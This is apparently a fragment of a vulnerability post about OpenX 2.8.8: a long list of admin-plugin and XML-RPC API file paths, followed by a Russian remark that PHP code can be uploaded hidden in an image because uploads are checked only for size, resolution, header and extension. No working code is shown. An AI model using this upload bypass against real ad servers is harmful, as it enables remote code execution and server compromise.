openx288/www/admin/plugins/oxMarket/navigation/oxMarketMultipleAccountsModeChecker.php openx288/www/admin/plugins/oxMarket/navigation/oxMarketStandaloneModeChecker.php openx288/www/admin/plugins/oxMarket/oxMarket.class.php openx288/www/admin/plugins/videoReport/lib/Graph/Flash/AreaGraph.php openx288/www/admin/plugins/videoReport/lib/Graph/Flash/BaseGraph.php openx288/www/admin/plugins/videoReport/lib/Graph/Flash/LineGraph.php openx288/www/admin/plugins/videoReport/lib/ofc2/ofc_area_base.php openx288/www/admin/plugins/videoReport/lib/ofc2/ofc_area_hollow.php openx288/www/admin/plugins/videoReport/lib/ofc2/ofc_area_line.php openx288/www/admin/plugins/videoReport/lib/ofc2/ofc_bar_filled.php openx288/www/admin/plugins/videoReport/lib/ofc2/ofc_line_dot.php openx288/www/admin/plugins/videoReport/lib/ofc2/ofc_line_hollow.php openx288/www/admin/plugins/videoReport/lib/ofc2/ofc_sugar.php openx288/www/admin/plugins/videoReport/lib/ofc2/ofc_y_axis.php openx288/www/admin/plugins/videoReport/lib/ofc2/ofc_y_axis_right.php openx288/www/admin/plugins/videoReport/lib/SmartyFunctions/function.url.php openx288/www/admin/plugins/videoReport/lib/SmartyFunctions/modifier.formatNumber.php PHP: openx288/www/admin/plugins/videoReport/navigation/oxVastMenuChecker.php openx288/www/admin/plugins/videoReport/players.php openx288/www/admin/plugins/videoReport/stats-api.php openx288/www/admin/plugins/videoReport/stats-debug.php openx288/www/admin/plugins/videoReport/stats-export-csv.php openx288/www/admin/plugins/videoReport/stats-video.php openx288/www/admin/plugins/videoReport/zone-invocation-code.php openx288/www/api/v1/common/BaseAdvertiserService.php openx288/www/api/v1/common/BaseAgencyService.php openx288/www/api/v1/common/BaseBannerService.php openx288/www/api/v1/common/BaseCampaignService.php openx288/www/api/v1/common/BaseLogonService.php openx288/www/api/v1/common/BasePublisherService.php openx288/www/api/v1/common/BaseServiceImpl.php openx288/www/api/v1/common/BaseUserService.php openx288/www/api/v1/common/BaseZoneService.php openx288/www/api/v1/common/XmlRpcUtils.php openx288/www/api/v1/xmlrpc/AdvertiserServiceImpl.php openx288/www/api/v1/xmlrpc/AgencyServiceImpl.php openx288/www/api/v1/xmlrpc/BannerServiceImpl.php openx288/www/api/v1/xmlrpc/CampaignServiceImpl.php openx288/www/api/v1/xmlrpc/LogonServiceImpl.php openx288/www/api/v1/xmlrpc/PublisherServiceImpl.php openx288/www/api/v1/xmlrpc/UserServiceImpl.php openx288/www/api/v1/xmlrpc/ZoneServiceImpl.php openx288/www/api/v2/common/BaseAdvertiserService.php openx288/www/api/v2/common/BaseAgencyService.php openx288/www/api/v2/common/BaseBannerService.php openx288/www/api/v2/common/BaseCampaignService.php openx288/www/api/v2/common/BaseChannelService.php openx288/www/api/v2/common/BaseLogonService.php openx288/www/api/v2/common/BasePublisherService.php openx288/www/api/v2/common/BaseServiceImpl.php openx288/www/api/v2/common/BaseTrackerService.php openx288/www/api/v2/common/BaseUserService.php openx288/www/api/v2/common/BaseVariableService.php openx288/www/api/v2/common/BaseZoneService.php openx288/www/api/v2/common/XmlRpcUtils.php openx288/www/api/v2/xmlrpc/AdvertiserServiceImpl.php openx288/www/api/v2/xmlrpc/AgencyServiceImpl.php openx288/www/api/v2/xmlrpc/BannerServiceImpl.php openx288/www/api/v2/xmlrpc/CampaignServiceImpl.php openx288/www/api/v2/xmlrpc/ChannelServiceImpl.php openx288/www/api/v2/xmlrpc/LogonServiceImpl.php openx288/www/api/v2/xmlrpc/PublisherServiceImpl.php openx288/www/api/v2/xmlrpc/TrackerServiceImpl.php openx288/www/api/v2/xmlrpc/UserServiceImpl.php openx288/www/api/v2/xmlrpc/VariableServiceImpl.php openx288/www/api/v2/xmlrpc/ZoneServiceImpl.php
Актуально во всех версиях OpenX. Загрузка php-кода внутри картинки. Единственные проверки файла это размер,разрешение, заголовок и расширение.
